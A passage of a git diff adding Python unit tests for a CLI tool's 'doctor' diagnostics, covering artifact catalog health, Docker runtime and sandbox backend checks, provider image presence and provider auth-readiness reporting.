GovernedArtifact(kind=ArtifactKind.SKILL, name="safety-rules") + bundle = ArtifactBundle(name="core", artifacts=("safety-rules",)) + org = _make_org_config( + artifacts={"safety-rules": art}, + catalog_bundles={"core": bundle}, + ) + with ( + patch(_PATCH_RAW, return_value={"profiles": {}}), + patch(_PATCH_NORMALIZE, return_value=org), + ): + result = check_catalog_health() + + assert result is not None + assert result.passed is True + assert "1 artifact" in result.message + assert "1 bundle" in result.message + + def test_bundle_references_missing_artifact(self) -> None: + """Bundle references unknown artifact → error.""" + bundle = ArtifactBundle(name="core", artifacts=("nonexistent",)) + org = _make_org_config(catalog_bundles={"core": bundle}) + with ( + patch(_PATCH_RAW, return_value={"profiles": {}}), + patch(_PATCH_NORMALIZE, return_value=org), + ): + result = check_catalog_health() + + assert result is not None + assert result.passed is False + assert "missing artifact" in result.message + + def test_binding_for_unknown_artifact(self) -> None: + """Binding exists for an artifact not in catalog → error.""" + binding = ProviderArtifactBinding(provider="claude") + org = _make_org_config( + bindings={"ghost-artifact": (binding,)}, + ) + with ( + patch(_PATCH_RAW, return_value={"profiles": {}}), + patch(_PATCH_NORMALIZE, return_value=org), + ): + result = check_catalog_health() + + assert result is not None + assert result.passed is False + assert "unknown artifact" in result.message + + def test_handles_exception(self) -> None: + """Exception during check → error result.""" + with ( + patch(_PATCH_RAW, return_value={"profiles": {}}), + patch(_PATCH_NORMALIZE, side_effect=RuntimeError("bad")), + ): + result = check_catalog_health() + + assert result is not None + assert result.passed is False + + +# ═══════════════════════════════════════════════════════════════════════════════ +# build_artifact_diagnostics_summary (support bundle) +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestBuildArtifactDiagnosticsSummary: + """Tests for support-bundle artifact diagnostics.""" + + def test_standalone_mode(self) -> None: + """No org config → standalone summary.""" + with patch(_PATCH_RAW, return_value=None): + summary = build_artifact_diagnostics_summary() + + assert summary["team_context"]["state"] == "standalone" # type: ignore[index] + assert summary["resolution"]["state"] == "not_applicable" # type: ignore[index] + + def test_no_profile_selected(self) -> None: + """Org config but no profile → no_profile_selected.""" + with ( + patch(_PATCH_RAW, return_value={"organization": {"name": "X"}}), + patch(_PATCH_PROFILE, return_value=None), + ): + summary = build_artifact_diagnostics_summary() + + assert summary["team_context"]["state"] == "no_profile_selected" # type: ignore[index] + + def test_active_profile_with_resolved_bundles(self) -> None: + """Full resolution scenario.""" + art = GovernedArtifact( + kind=ArtifactKind.SKILL, + name="safety-rules", + install_intent=ArtifactInstallIntent.REQUIRED, + ) + bundle = ArtifactBundle( + name="core-safety", + artifacts=("safety-rules",), + install_intent=ArtifactInstallIntent.REQUIRED, + ) + org = _make_org_config( + profile_name="dev-team", + bundles=("core-safety",), + artifacts={"safety-rules": art}, + catalog_bundles={"core-safety": bundle}, + ) + with ( + patch(_PATCH_RAW, return_value={"profiles": {}}), + patch(_PATCH_PROFILE, return_value="dev-team"), + patch(_PATCH_NORMALIZE, return_value=org), + ): + summary = build_artifact_diagnostics_summary() + + ctx = summary["team_context"] + assert ctx["state"] == "active" # type: ignore[index] + assert ctx["profile"] == "dev-team" # type: ignore[index] + assert "core-safety" in ctx["bundles"] # type: ignore[index,operator] + + res = summary["resolution"] + assert res["state"] == "resolved" # type: ignore[index] + assert len(res["plans"]) == 1 # type: ignore[index,arg-type] + plan = res["plans"][0] # type: ignore[index] + assert plan["effective_artifacts"] == ["safety-rules"] + + cat = summary["catalog"] + assert cat["artifact_count"] == 1 # type: ignore[index] + assert cat["bundle_count"] == 1 # type: ignore[index] + + def test_normalization_failure(self) -> None: + """Normalization error → error state in all sections.""" + with ( + patch(_PATCH_RAW, return_value={"profiles": {}}), + patch(_PATCH_PROFILE, return_value="dev-team"), + patch(_PATCH_NORMALIZE, side_effect=RuntimeError("parse error")), + ): + summary = build_artifact_diagnostics_summary() + + assert summary["team_context"]["state"] == "error" # type: ignore[index] + assert summary["resolution"]["state"] == "error" # type: ignore[index] + + def test_profile_not_found_still_reports(self) -> None: + """Selected profile missing from org → context reports it.""" + org = _make_org_config(profile_name="other-team") + with ( + patch(_PATCH_RAW, return_value={"profiles": {}}), + patch(_PATCH_PROFILE, return_value="missing-team"), + patch(_PATCH_NORMALIZE, return_value=org), + ): + summary = build_artifact_diagnostics_summary() + + ctx = summary["team_context"] + assert ctx["state"] == "active" # type: ignore[index] + assert ctx["profile_found"] is False # type: ignore[index] + + def test_resolution_with_skipped_artifacts(self) -> None: + """Resolution that skips disabled artifacts → diagnostics populated.""" + disabled_art = GovernedArtifact( + kind=ArtifactKind.SKILL, + name="deprecated-tool", + install_intent=ArtifactInstallIntent.DISABLED, + ) + active_art = GovernedArtifact( + kind=ArtifactKind.SKILL, + name="active-tool", + install_intent=ArtifactInstallIntent.REQUIRED, + ) + bundle = ArtifactBundle( + name="mixed-bundle", + artifacts=("active-tool", "deprecated-tool"), + install_intent=ArtifactInstallIntent.REQUIRED, + ) + org = _make_org_config( + profile_name="dev-team", + bundles=("mixed-bundle",), + artifacts={ + "active-tool": active_art, + "deprecated-tool": disabled_art, + }, + catalog_bundles={"mixed-bundle": bundle}, + ) + with ( + patch(_PATCH_RAW, return_value={"profiles": {}}), + patch(_PATCH_PROFILE, return_value="dev-team"), + patch(_PATCH_NORMALIZE, return_value=org), + ): + summary = build_artifact_diagnostics_summary() + + res = summary["resolution"] + assert res["state"] == "resolved" # type: ignore[index] + plans = res["plans"] # type: ignore[index] + assert len(plans) == 1 # type: ignore[arg-type] + assert "deprecated-tool" in plans[0]["skipped"] # type: ignore[index] + assert "active-tool" in plans[0]["effective_artifacts"] # type: ignore[index] + + +# ═══════════════════════════════════════════════════════════════════════════════ +# Integration with run_all_checks +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestRunAllChecksIntegration: + """Verify artifact checks are registered in run_all_checks.""" + + def test_artifact_checks_are_registered(self) -> None: + """Confirm the check names appear in run_all_checks output.""" + from scc_cli.doctor.checks import run_all_checks + from scc_cli.doctor.types import CheckResult + + # Patch everything to isolate from real environment + with ExitStack() as stack: + mock_git = stack.enter_context(patch("scc_cli.doctor.checks.environment.check_git")) + mock_docker = stack.enter_context( + patch("scc_cli.doctor.checks.environment.check_docker") + ) + mock_dd = stack.enter_context( + patch("scc_cli.doctor.checks.environment.check_docker_desktop") + ) + mock_ds = stack.enter_context( + patch("scc_cli.doctor.checks.environment.check_docker_sandbox") + ) + mock_dr = stack.enter_context( + patch("scc_cli.doctor.checks.environment.check_docker_running") + ) + mock_wsl = stack.enter_context(patch("scc_cli.doctor.checks.environment.check_wsl2")) + mock_rb = stack.enter_context( + patch("scc_cli.doctor.checks.environment.check_runtime_backend") + ) + mock_cd = stack.enter_context( + patch("scc_cli.doctor.checks.config.check_config_directory") + ) + mock_ucv = stack.enter_context( + patch("scc_cli.doctor.checks.config.check_user_config_valid") + ) + stack.enter_context( + patch( + "scc_cli.doctor.checks.worktree.check_git_version_for_worktrees", + return_value=None, + ) + ) + stack.enter_context( + patch("scc_cli.doctor.checks.worktree.check_worktree_health", return_value=None) + ) + stack.enter_context( + patch( + "scc_cli.doctor.checks.worktree.check_worktree_branch_conflicts", + return_value=None, + ) + ) + stack.enter_context( + patch( + "scc_cli.doctor.checks.organization.check_org_config_reachable", + return_value=None, + ) + ) + stack.enter_context( + patch( + "scc_cli.doctor.checks.organization.check_marketplace_auth_available", + return_value=None, + ) + ) + stack.enter_context( + patch( + "scc_cli.doctor.checks.organization.check_credential_injection", + return_value=None, + ) + ) + mock_cache = stack.enter_context( + patch("scc_cli.doctor.checks.cache.check_cache_readable") + ) + stack.enter_context( + patch("scc_cli.doctor.checks.cache.check_cache_ttl_status", return_value=None) + ) + mock_exc = stack.enter_context( + patch("scc_cli.doctor.checks.cache.check_exception_stores") + ) + mock_sp = stack.enter_context(patch("scc_cli.doctor.checks.safety.check_safety_policy")) + stack.enter_context( + patch(_PATCH_RAW, return_value={"organization": {"name": "Test"}, "profiles": {}}) + ) + stack.enter_context(patch(_PATCH_PROFILE, return_value="dev-team")) + stub = CheckResult(name="stub", passed=True, message="ok") + mock_git.return_value = stub + mock_docker.return_value = stub + mock_dd.return_value = stub + mock_ds.return_value = stub + mock_dr.return_value = stub + mock_wsl.return_value = (stub, False) + mock_rb.return_value = stub + mock_cd.return_value = stub + mock_ucv.return_value = stub + mock_cache.return_value = stub + mock_exc.return_value = stub + mock_sp.return_value = stub + + results = run_all_checks() + + names = [r.name for r in results] + assert "Team Context" in names diff --git a/tests/test_doctor_checks.py b/tests/test_doctor_checks.py index acf4ea9..0b69a09 100644 --- a/tests/test_doctor_checks.py +++ b/tests/test_doctor_checks.py @@ -616,6 +616,203 @@ def test_returns_none_when_cache_invalid(self, tmp_path): # ═══════════════════════════════════════════════════════════════════════════════ +# ═══════════════════════════════════════════════════════════════════════════════ +# Tests for check_runtime_backend +# ═══════════════════════════════════════════════════════════════════════════════ + + +class TestCheckRuntimeBackend: + """Tests for check_runtime_backend() function.""" + + @staticmethod + def _mock_adapters(runtime_info: object | None = None) -> object: + """Create a mock adapters object with a runtime_probe attribute.""" + from unittest.mock import MagicMock + + adapters = MagicMock() + if runtime_info is None: + adapters.runtime_probe = None + else: + adapters.runtime_probe.probe.return_value = runtime_info + return adapters + + def test_returns_ok_for_docker_sandbox_backend(self) -> None: + """Should return passed=True when daemon is reachable with docker-sandbox backend.""" + from scc_cli.core.contracts import RuntimeInfo + + mock_info = RuntimeInfo( + runtime_id="docker", + display_name="Docker Desktop", + cli_name="docker", + supports_oci=True, + supports_internal_networks=True, + supports_host_network=True, + version="27.0.1", + daemon_reachable=True, + sandbox_available=True, + preferred_backend="docker-sandbox", + ) + with patch( + "scc_cli.bootstrap.get_default_adapters", + return_value=self._mock_adapters(mock_info), + ): + result = doctor.check_runtime_backend() + + assert result.passed is True + assert result.name == "Runtime Backend" + assert "docker-sandbox" in result.message + assert "Docker Desktop" in result.message + assert result.version == "27.0.1" + + def test_returns_ok_for_oci_backend(self) -> None: + """Should return passed=True when daemon is reachable with oci backend.""" + from scc_cli.core.contracts import RuntimeInfo + + mock_info = RuntimeInfo( + runtime_id="docker", + display_name="Docker Engine", + cli_name="docker", + supports_oci=True, + supports_internal_networks=True, + supports_host_network=True, + version="24.0.6", + daemon_reachable=True, + sandbox_available=False, + preferred_backend="oci", + ) + with patch( + "scc_cli.bootstrap.get_default_adapters", + return_value=self._mock_adapters(mock_info), + ): + result = doctor.check_runtime_backend() + + assert result.passed is True + assert "oci" in result.message + assert "Docker Engine" in result.message + assert result.version == "24.0.6" + + def test_returns_warning_when_daemon_unavailable(self) -> None: + """Should return passed=False with warning when daemon is unreachable.""" + from scc_cli.core.contracts import RuntimeInfo + + mock_info = RuntimeInfo( + runtime_id="docker", + display_name="Docker (daemon not running)", + cli_name="docker", + supports_oci=True, + supports_internal_networks=False, + supports_host_network=False, + daemon_reachable=False, + sandbox_available=False, + preferred_backend=None, + ) + with patch( + "scc_cli.bootstrap.get_default_adapters", + return_value=self._mock_adapters(mock_info), + ): + result = doctor.check_runtime_backend() + + assert result.passed is False + assert result.severity == "warning" + assert "not reachable" in result.message + + def test_returns_warning_on_probe_exception(self) -> None: + """Should return passed=False with warning when get_default_adapters raises.""" + with patch( + "scc_cli.bootstrap.get_default_adapters", + side_effect=RuntimeError("probe exploded"), + ): + result = doctor.check_runtime_backend() + + assert result.passed is False + assert result.severity == "warning" + assert "probe exploded" in result.message + + +class TestCheckDockerSandbox: + """Tests for doctor-level sandbox backend reporting.""" + + @staticmethod + def _mock_adapters(runtime_info: object | None = None) -> object: + from unittest.mock import MagicMock + + adapters = MagicMock() + if runtime_info is None: + adapters.runtime_probe = None + else: + adapters.runtime_probe.probe.return_value = runtime_info + return adapters + + def test_returns_ok_when_docker_sandbox_is_available(self) -> None: + """Should pass when Docker Desktop sandbox support exists.""" + with patch("scc_cli.docker.check_docker_sandbox", return_value=True): + result = doctor.check_docker_sandbox() + + assert result.passed is True + assert result.name == "Sandbox Backend" + assert "Docker sandbox backend" in result.message + + def test_returns_ok_when_oci_backend_is_selected(self) -> None: + """Should pass when OCI is the selected runtime backend.""" + from scc_cli.core.contracts import RuntimeInfo + + mock_info = RuntimeInfo( + runtime_id="docker", + display_name="Docker Engine", + cli_name="docker", + supports_oci=True, + supports_internal_networks=True, + supports_host_network=True, + version="28.5.2", + daemon_reachable=True, + sandbox_available=False, + preferred_backend="oci", + ) + + with ( + patch("scc_cli.docker.check_docker_sandbox", return_value=False), + patch( + "scc_cli.bootstrap.get_default_adapters", + return_value=self._mock_adapters(mock_info), + ), + ): + result = doctor.check_docker_sandbox() + + assert result.passed is True + assert result.severity == "info" + assert "OCI backend" in result.message + + def test_returns_error_when_no_backend_is_available(self) -> None: + """Should fail when neither Docker sandbox nor OCI is usable.""" + from scc_cli.core.contracts import RuntimeInfo + + mock_info = RuntimeInfo( + runtime_id="docker", + display_name="Docker", + cli_name="docker", + supports_oci=True, + supports_internal_networks=False, + supports_host_network=False, + version="28.5.2", + daemon_reachable=False, + sandbox_available=False, + preferred_backend=None, + ) + + with ( + patch("scc_cli.docker.check_docker_sandbox", return_value=False), + patch( + "scc_cli.bootstrap.get_default_adapters", + return_value=self._mock_adapters(mock_info), + ), + ): + result = doctor.check_docker_sandbox() + + assert result.passed is False + assert result.severity == "error" + assert "usable sandbox backend" in result.message + + class TestRunAllChecks: """Tests for run_all_checks() integration.""" @@ -634,6 +831,9 @@ def test_includes_new_checks_in_results(self): mock_org = doctor.CheckResult(name="Org Config", passed=True, message="reachable") mock_auth = doctor.CheckResult(name="Auth", passed=True, message="ok") mock_injection = doctor.CheckResult(name="Injection", passed=True, message="ok") + mock_runtime = doctor.CheckResult( + name="Runtime Backend", passed=True, message="docker-sandbox" + ) mock_cache = doctor.CheckResult(name="Cache", passed=True, message="ok") mock_ttl = doctor.CheckResult(name="TTL", passed=True, message="ok") @@ -643,6 +843,7 @@ def test_includes_new_checks_in_results(self): patch("scc_cli.doctor.check_docker_desktop", return_value=mock_docker), patch("scc_cli.doctor.check_docker_sandbox", return_value=mock_sandbox), patch("scc_cli.doctor.check_docker_running", return_value=mock_daemon), + patch("scc_cli.doctor.check_runtime_backend", return_value=mock_runtime), patch("scc_cli.doctor.check_wsl2", return_value=(mock_wsl2, False)), patch("scc_cli.doctor.check_config_directory", return_value=mock_config), patch("scc_cli.doctor.check_user_config_valid", return_value=mock_user_config), diff --git a/tests/test_doctor_image_check.py b/tests/test_doctor_image_check.py new file mode 100644 index 0000000..eeaa9a1 --- /dev/null +++ b/tests/test_doctor_image_check.py @@ -0,0 +1,204 @@ +"""Tests for the provider image doctor check.""" + +from __future__ import annotations + +import subprocess +from unittest.mock import MagicMock, patch + +from scc_cli.doctor.checks.environment import check_provider_image + + +class TestCheckProviderImage: + """Tests for check_provider_image().""" + + @patch("scc_cli.doctor.checks.environment.subprocess.run") + def test_image_found_claude(self, mock_run: MagicMock) -> None: + """Image present locally → passed=True.""" + mock_run.return_value = MagicMock(returncode=0) + + with patch("scc_cli.config.get_selected_provider", return_value="claude"): + result = check_provider_image() + + assert result.passed is True + assert result.name == "Provider Image" + assert "scc-agent-claude:latest" in result.message + + @patch("scc_cli.doctor.checks.environment.subprocess.run") + def test_image_found_codex(self, mock_run: MagicMock) -> None: + """Codex provider image present → passed=True.""" + mock_run.return_value = MagicMock(returncode=0) + + with patch("scc_cli.config.get_selected_provider", return_value="codex"): + result = check_provider_image() + + assert result.passed is True + assert "scc-agent-codex:latest" in result.message + + @patch("scc_cli.doctor.checks.environment.subprocess.run") + def test_image_not_found_claude(self, mock_run: MagicMock) -> None: + """Image missing → passed=False with correct fix_commands.""" + mock_run.return_value = MagicMock(returncode=1) + + with patch("scc_cli.config.get_selected_provider", return_value="claude"): + result = check_provider_image() + + assert result.passed is False + assert result.fix_commands is not None + assert len(result.fix_commands) == 1 + assert ( + result.fix_commands[0] + == "docker build -t scc-agent-claude:latest images/scc-agent-claude/" + ) + assert result.fix_hint == "Build the claude agent image" + assert result.severity == "warning" + + @patch("scc_cli.doctor.checks.environment.subprocess.run") + def test_image_not_found_codex(self, mock_run: MagicMock) -> None: + """Codex image missing → fix_commands uses codex paths.""" + mock_run.return_value = MagicMock(returncode=1) + + with patch("scc_cli.config.get_selected_provider", return_value="codex"): + result = check_provider_image() + + assert result.passed is False + assert result.fix_commands is not None + assert ( + result.fix_commands[0] + == "docker build -t scc-agent-codex:latest images/scc-agent-codex/" + ) + assert result.fix_hint == "Build the codex agent image" + + @patch("scc_cli.doctor.checks.environment.subprocess.run") + def test_unknown_provider_falls_back_to_claude(self, mock_run: MagicMock) -> None: + """Unknown provider_id → falls back to claude image ref.""" + mock_run.return_value = MagicMock(returncode=0) + + with patch("scc_cli.config.get_selected_provider", return_value="unknown_provider"): + result = check_provider_image() + + assert result.passed is True + assert "scc-agent-claude:latest" in result.message + + @patch("scc_cli.doctor.checks.environment.subprocess.run") + def test_no_provider_selected_defaults_to_claude(self, mock_run: MagicMock) -> None: + """No provider selected (None) → defaults to claude.""" + mock_run.return_value = MagicMock(returncode=0) + + with patch("scc_cli.config.get_selected_provider", return_value=None): + result = check_provider_image() + + assert result.passed is True + assert "scc-agent-claude:latest" in result.message + + @patch("scc_cli.doctor.checks.environment.subprocess.run") + def test_subprocess_timeout(self, mock_run: MagicMock) -> None: + """Subprocess timeout → graceful failure.""" + mock_run.side_effect = subprocess.TimeoutExpired(cmd="docker", timeout=10) + + with patch("scc_cli.config.get_selected_provider", return_value="claude"): + result = check_provider_image() + + assert result.passed is False + assert "Could not check provider image" in result.message + assert result.severity == "warning" + + @patch("scc_cli.doctor.checks.environment.subprocess.run") + def test_docker_not_found(self, mock_run: MagicMock) -> None: + """Docker binary missing → FileNotFoundError → graceful failure.""" + mock_run.side_effect = FileNotFoundError("docker not found") + + with patch("scc_cli.config.get_selected_provider", return_value="claude"): + result = check_provider_image() + + assert result.passed is False + assert "Could not check provider image" in result.message + assert result.fix_hint == "Ensure Docker is installed and reachable" + + def test_config_module_import_failure(self) -> None: + """If config import fails, falls back to claude.""" + with ( + patch( + "scc_cli.doctor.checks.environment.subprocess.run", + return_value=MagicMock(returncode=0), + ), + patch( + "scc_cli.doctor.checks.environment.config_module", + create=True, + side_effect=ImportError("no config"), + ), + ): + # The function does a deferred import, so we patch at the import site + with patch.dict("sys.modules", {"scc_cli.config": None}): + # When the import itself raises, provider defaults to "claude" + result = check_provider_image() + + assert result.passed is True + assert "scc-agent-claude:latest" in result.message + + +class TestCheckProviderImageInDoctor: + """Integration: check_provider_image wired into run_doctor.""" + + @patch("scc_cli.doctor.checks.environment.subprocess.run") + def test_doctor_includes_provider_image_check( + self, + mock_subprocess: MagicMock, + ) -> None: + """run_doctor includes provider-scoped image checks when docker_ok.""" + # Make docker checks pass + mock_subprocess.return_value = MagicMock(returncode=0) + + with ( + patch("scc_cli.doctor.checks.environment.check_git"), + patch("scc_cli.doctor.core.check_git") as mock_core_git, + patch("scc_cli.doctor.core.check_docker") as mock_docker, + patch("scc_cli.doctor.core.check_docker_running") as mock_daemon, + patch("scc_cli.doctor.core.check_docker_sandbox") as mock_sandbox, + patch("scc_cli.doctor.core.check_runtime_backend") as mock_runtime, + patch("scc_cli.doctor.core.check_provider_image") as mock_image, + patch("scc_cli.doctor.core.check_wsl2") as mock_wsl, + patch("scc_cli.doctor.core.check_config_directory") as mock_config, + patch("scc_cli.doctor.core.check_user_config_valid") as mock_user_cfg, + patch("scc_cli.doctor.core.check_safety_policy") as mock_safety, + ): + from scc_cli.doctor.types import CheckResult + + passed_result = CheckResult(name="test", passed=True, message="ok") + mock_core_git.return_value = CheckResult( + name="Git", passed=True, message="ok", version="2.40" + ) + mock_docker.return_value = CheckResult( + name="Docker", passed=True, message="ok", version="24.0" + ) + mock_daemon.return_value = CheckResult(name="Docker Daemon", passed=True, message="ok") + mock_sandbox.return_value = CheckResult( + name="Sandbox Backend", passed=True, message="ok" + ) + mock_runtime.return_value = passed_result + mock_image.side_effect = [ + CheckResult( + name="Provider Image", + passed=True, + message="scc-agent-claude:latest found", + ), + CheckResult( + name="Provider Image", + passed=True, + message="scc-agent-codex:latest found", + ), + ] + mock_wsl.return_value = (passed_result, False) + mock_config.return_value = passed_result + mock_user_cfg.return_value = passed_result + mock_safety.return_value = passed_result + + from scc_cli.doctor.core import run_doctor + + doctor_result = run_doctor() + + check_names = [c.name for c in doctor_result.checks] + assert "Provider Image (Claude Code)" in check_names + assert "Provider Image (Codex)" in check_names + assert mock_image.call_count == 2 + assert mock_image.call_args_list[0].kwargs == {"provider_id": "claude"} + assert mock_image.call_args_list[1].kwargs == {"provider_id": "codex"} diff --git a/tests/test_doctor_provider_errors.py b/tests/test_doctor_provider_errors.py new file mode 100644 index 0000000..610c78c --- /dev/null +++ b/tests/test_doctor_provider_errors.py @@ -0,0 +1,275 @@ +"""Tests for provider-aware doctor types and check functions. + +Covers: +- ProviderNotReadyError message/action/exit_code +- ProviderImageMissingError message/action/exit_code +- AuthReadiness field access +- CheckResult category default and explicit values +- check_provider_auth via adapter-owned auth_check() (D037) +""" + +from __future__ import annotations + +from unittest.mock import MagicMock, patch + +import pytest + +from scc_cli.core.contracts import AuthReadiness +from scc_cli.core.errors import ProviderImageMissingError, ProviderNotReadyError +from scc_cli.doctor.checks.environment import check_provider_auth +from scc_cli.doctor.types import CheckResult + +# --------------------------------------------------------------------------- +# ProviderNotReadyError +# --------------------------------------------------------------------------- + + +class TestProviderNotReadyError: + """ProviderNotReadyError carries provider_id and auto-populates messages.""" + + def test_message_includes_provider_id(self) -> None: + err = ProviderNotReadyError(provider_id="codex") + assert "codex" in err.user_message + assert "not ready" in err.user_message + + def test_suggested_action_includes_doctor_command(self) -> None: + err = ProviderNotReadyError(provider_id="codex") + assert "scc doctor --provider codex" in err.suggested_action + + def test_exit_code_is_3(self) -> None: + err = ProviderNotReadyError(provider_id="claude") + assert err.exit_code == 3 + + def test_str_returns_user_message(self) -> None: + err = ProviderNotReadyError(provider_id="claude") + assert str(err) == err.user_message + + def test_custom_message_preserved(self) -> None: + err = ProviderNotReadyError( + provider_id="claude", + user_message="Custom not ready", + suggested_action="Do this instead", + ) + assert err.user_message == "Custom not ready" + assert err.suggested_action == "Do this instead" + + +# --------------------------------------------------------------------------- +# ProviderImageMissingError +# --------------------------------------------------------------------------- + + +class TestProviderImageMissingError: + """ProviderImageMissingError carries provider_id and optional image_ref.""" + + def test_message_includes_provider_and_image(self) -> None: + err = ProviderImageMissingError(provider_id="codex", image_ref="scc-agent-codex:latest") + assert "codex" in err.user_message + assert "scc-agent-codex:latest" in err.user_message + + def test_message_without_image_ref(self) -> None: + err = ProviderImageMissingError(provider_id="codex") + assert "codex" in err.user_message + # No image detail appended + assert "()" not in err.user_message + + def test_suggested_action_includes_build_command(self) -> None: + err = ProviderImageMissingError(provider_id="codex") + assert "images/scc-agent-codex/" in err.suggested_action + + def test_exit_code_is_3(self) -> None: + err = ProviderImageMissingError(provider_id="claude") + assert err.exit_code == 3 + + def test_custom_messages_preserved(self) -> None: + err = ProviderImageMissingError( + provider_id="claude", + user_message="Image gone", + suggested_action="Rebuild it", + ) + assert err.user_message == "Image gone" + assert err.suggested_action == "Rebuild it" + + +# --------------------------------------------------------------------------- +# AuthReadiness +# --------------------------------------------------------------------------- + + +class TestAuthReadiness: + """AuthReadiness is a frozen dataclass with status, mechanism, guidance.""" + + def test_field_access(self) -> None: + ar = AuthReadiness( + status="present", + mechanism="oauth_file", + guidance="No action needed", + ) + assert ar.status == "present" + assert ar.mechanism == "oauth_file" + assert ar.guidance == "No action needed" + + def test_frozen(self) -> None: + ar = AuthReadiness(status="missing", mechanism="auth_json_file", guidance="Login") + with pytest.raises(AttributeError): + ar.status = "present" # type: ignore[misc] + + def test_missing_status(self) -> None: + ar = AuthReadiness( + status="missing", + mechanism="auth_json_file", + guidance="Run codex auth to authenticate", + ) + assert ar.status == "missing" + assert ar.mechanism == "auth_json_file" + + +# --------------------------------------------------------------------------- +# CheckResult.category +# --------------------------------------------------------------------------- + + +class TestCheckResultCategory: + """CheckResult has a category field defaulting to 'general'.""" + + def test_default_category_is_general(self) -> None: + cr = CheckResult(name="Test", passed=True, message="ok") + assert cr.category == "general" + + def test_explicit_category(self) -> None: + cr = CheckResult(name="Test", passed=True, message="ok", category="provider") + assert cr.category == "provider" + + +# --------------------------------------------------------------------------- +# check_provider_auth +# --------------------------------------------------------------------------- + + +def _make_fake_adapters( + *, + claude_readiness: AuthReadiness | None = None, + codex_readiness: AuthReadiness | None = None, + claude_exc: Exception | None = None, + codex_exc: Exception | None = None, +) -> MagicMock: + """Build a fake DefaultAdapters with configurable auth_check() results.""" + claude_provider = MagicMock() + codex_provider = MagicMock() + + if claude_exc is not None: + claude_provider.auth_check.side_effect = claude_exc + elif claude_readiness is not None: + claude_provider.auth_check.return_value = claude_readiness + else: + claude_provider.auth_check.return_value = AuthReadiness( + status="present", mechanism="oauth_file", guidance="No action needed" + ) + + if codex_exc is not None: + codex_provider.auth_check.side_effect = codex_exc + elif codex_readiness is not None: + codex_provider.auth_check.return_value = codex_readiness + else: + codex_provider.auth_check.return_value = AuthReadiness( + status="present", mechanism="auth_json_file", guidance="No action needed" + ) + + adapters = MagicMock() + adapters.agent_provider = claude_provider + adapters.codex_agent_provider = codex_provider + return adapters + + +class TestCheckProviderAuth: + """check_provider_auth delegates to adapter-owned auth_check() (D037).""" + + @patch("scc_cli.bootstrap.get_default_adapters") + def test_happy_path_claude_auth_present(self, mock_adapters: MagicMock) -> None: + mock_adapters.return_value = _make_fake_adapters() + result = check_provider_auth(provider_id="claude") + assert result.passed is True + assert result.category == "provider" + assert "auth cache present" in result.message + assert "oauth_file" in result.message + + @patch("scc_cli.bootstrap.get_default_adapters") + def test_claude_auth_missing(self, mock_adapters: MagicMock) -> None: + mock_adapters.return_value = _make_fake_adapters( + claude_readiness=AuthReadiness( + status="missing", + mechanism="oauth_file", + guidance="Run 'scc start --provider claude' to authenticate.", + ) + ) + result = check_provider_auth(provider_id="claude") + assert result.passed is False + assert result.category == "provider" + assert "auth cache missing" in result.message + + @patch("scc_cli.bootstrap.get_default_adapters") + def test_codex_auth_present(self, mock_adapters: MagicMock) -> None: + mock_adapters.return_value = _make_fake_adapters() + result = check_provider_auth(provider_id="codex") + assert result.passed is True + assert "auth cache present" in result.message + assert "auth_json_file" in result.message + + @patch("scc_cli.bootstrap.get_default_adapters") + def test_codex_auth_missing(self, mock_adapters: MagicMock) -> None: + mock_adapters.return_value = _make_fake_adapters( + codex_readiness=AuthReadiness( + status="missing", + mechanism="auth_json_file", + guidance="Run 'scc start --provider codex' to authenticate.", + ) + ) + result = check_provider_auth(provider_id="codex") + assert result.passed is False + assert result.category == "provider" + + @patch("scc_cli.bootstrap.get_default_adapters") + def test_unknown_provider_fallback(self, mock_adapters: MagicMock) -> None: + mock_adapters.return_value = _make_fake_adapters() + result = check_provider_auth(provider_id="nonexistent") + assert result.passed is False + assert "Unknown provider" in result.message + assert result.category == "provider" + + @patch("scc_cli.bootstrap.get_default_adapters") + def test_adapter_exception_handled(self, mock_adapters: MagicMock) -> None: + mock_adapters.return_value = _make_fake_adapters( + claude_exc=RuntimeError("Docker not reachable") + ) + result = check_provider_auth(provider_id="claude") + assert result.passed is False + assert result.category == "provider" + assert "Auth check failed" in result.message + + @patch("scc_cli.bootstrap.get_default_adapters") + def test_bootstrap_failure_handled(self, mock_adapters: MagicMock) -> None: + mock_adapters.side_effect = RuntimeError("Cannot initialise") + result = check_provider_auth(provider_id="claude") + assert result.passed is False + assert "Could not initialise" in result.message + assert result.category == "provider" + + @patch("scc_cli.bootstrap.get_default_adapters") + def test_truthful_wording_present(self, mock_adapters: MagicMock) -> None: + """D037: wording says 'auth cache present', not 'logged in'.""" + mock_adapters.return_value = _make_fake_adapters() + result = check_provider_auth(provider_id="claude") + assert "auth cache present" in result.message + assert "logged in" not in result.message.lower() + + @patch("scc_cli.bootstrap.get_default_adapters") + def test_truthful_wording_missing(self, mock_adapters: MagicMock) -> None: + """D037: wording says 'auth cache missing', not 'not logged in'.""" + mock_adapters.return_value = _make_fake_adapters( + claude_readiness=AuthReadiness( + status="missing", mechanism="oauth_file", guidance="Authenticate first" + ) + ) + result = check_provider_auth(provider_id="claude") + assert "auth cache missing" in result.message + assert "logged in" not in result.message.lower() diff --git a/tests/test_doctor_provider_wiring.py b/tests/test_doctor_provider_wiring.py new file mode 100644 index 0000000..eedc1a8 --- /dev/null +++ b/tests/test_doctor_provider_wiring.py @@ -0,0 +1,455 @@ +"""Tests for T02: doctor provider wiring, CLI flag, category assignment, and grouped output. + +Covers: +- run_doctor() threads provider_id to check_provider_image and check_provider_auth +- run_doctor() assigns categories to all checks +- doctor_cmd --provider validates against KNOWN_PROVIDERS +- doctor_cmd --provider unknown exits with error +- build_doctor_json_data includes category field +- render_doctor_results groups by category (check table row order) +""" + +from __future__ import annotations + +from unittest.mock import MagicMock, patch + +import pytest +from rich.console import Console + +from scc_cli.core.enums import SeverityLevel +from scc_cli.doctor.core import _CATEGORY_MAP, _assign_category, run_doctor +from scc_cli.doctor.render import _sort_checks_by_category, render_doctor_results +from scc_cli.doctor.serialization import build_doctor_json_data +from scc_cli.doctor.types import CheckResult, DoctorResult + +# --------------------------------------------------------------------------- +# Category assignment +# --------------------------------------------------------------------------- + + +class TestCategoryAssignment: + """Verify _assign_category populates the category field correctly.""" + + def test_git_gets_backend(self) -> None: + check = CheckResult(name="Git", passed=True, message="ok") + _assign_category(check) + assert check.category == "backend" + + def test_docker_gets_backend(self) -> None: + check = CheckResult(name="Docker", passed=True, message="ok") + _assign_category(check) + assert check.category == "backend" + + def test_provider_image_gets_provider(self) -> None: + check = 